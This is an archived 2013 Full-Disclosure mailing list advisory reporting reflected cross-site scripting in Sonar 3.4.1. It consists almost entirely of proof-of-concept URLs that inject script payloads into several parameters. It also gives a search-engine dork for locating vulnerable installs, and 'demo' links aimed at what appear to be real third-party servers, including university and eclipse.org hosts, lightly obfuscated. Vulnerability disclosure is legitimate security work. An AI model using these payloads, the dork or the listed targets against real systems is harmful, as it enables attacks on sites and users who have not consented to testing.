lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CALQcNBFJtbNi1=rFRwA3ey1x9KwxqNFB4AmwtBAWDt+YuN2tig@mail.gmail.com>
Date: Thu, 14 Feb 2013 09:58:20 +0100
From: "Kacper R." <info@...ilteam.pl>
To: full-disclosure@...ts.grok.org.uk
Subject: Sonar v.3.4.1 => XSS (CWE-79)

Sonar v.3.4.1 => XSS (CWE-79)

+ Vendor info
http://www.sonarsource.com/
Dork : intext:"Powered by SonarSource"
=========================================================
+ Author: devilteam.pl
+ WWW: http://devilteam.pl/
=========================================================



XSS:

http://foo.bar/dependencies/index?search="><script>alert(/devilteam.pl/
)</script>

http://foo.bar/dashboard/index/41730?did=4&period=3"><script>alert(/
devilteam.pl/)</script>

http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&am
p;author_login=&assignee_login="><script>alert(/devilteam.pl/
)</script>&false_positives=with
out&sort=&asc=false&commit=Search

http://foo.bar/reviews/index?review_id=&statuses[]=OPEN&statuses[]=REOPENED&severities[]=&projects[]=&am
p;author_login="><script>alert(/devilteam.pl/
)</script>&assignee_login=&false_positives=with
out&sort=&asc=false&commit=Search

http://foo.bar/api/sources?resource=<script>alert(/devilteam.pl/
)</script>&format=txt

demo:
http://nemo.sonarXsource.org/dependencies/index?search="><script>alert(/
devilteam.pl/)</script>
https://dev.eclipXse.org/sonar/dependencies/index?search="><script>alert(/
devilteam.pl/)</script>
https://gcrcwin.cXacr.med.umich.edu/sonar/dependencies/index?search=
"><script>alert(/devilteam.pl/)</sc
ript>
http://csci3601sp12.mXorris.umn.edu:2020/sonar/dependencies/index?search=
"><script>alert(/devilteam.pl/)&l
t;/script>
https://redbox-build.cqXu.edu.au/sonar/dependencies/index?search=
"><script>alert(/devilteam.pl/)</scrip
t>


greetz:
cxsec.org

Source: http://cxsecurity.com/blad/WLB-2013020088

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ